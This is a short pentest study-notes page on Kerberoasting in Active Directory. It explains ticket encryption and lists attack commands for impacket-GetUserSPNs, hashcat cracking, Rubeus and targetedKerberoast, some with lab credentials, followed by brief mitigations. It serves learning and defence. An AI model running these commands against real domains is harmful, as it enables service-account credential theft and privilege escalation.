Kerberoasting

Overview

This attack takes advantage of service accounts that use Kerberos authentication.

First we request a TGT (Ticket Granting Ticket) from the KDC using the account we compromised. Next we request a TGS (Ticket Granting Service ticket) as well. The key flaw is that the TGS is encrypted with the Services account password hash.

Using the tool GetUserSPNs to request a TGS and obtain the Service accounts password hash.

GetUserSPNs

sudo impacket-GetUserSPNs PNPT.local/greg:Password1 -dc-ip 192.168.1.129 -request

hashcat -m 13100 crackme.txt ~/rockyou.txt -O

Rubeus

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Targeted Kerberoast

GitHub - ShutdownRepo/targetedKerberoast: Kerberoast with ACL abuse capabilitiesGitHub

python targetedKerberoast.py -v -d offsec.lab -u hrapp -p 'Untimed$Runny'

Mitigation

Strong password policy
Principle of least privilege
Service accounts should NOT be Domain Administrators

PreviousPost-Compromise Attacks NextSilver Ticket

Last updated 1 year ago

hashtagOverview

hashtagGetUserSPNs

hashtagRubeus

hashtagTargeted Kerberoast

hashtagMitigation

Overview

GetUserSPNs

Rubeus

Targeted Kerberoast

Mitigation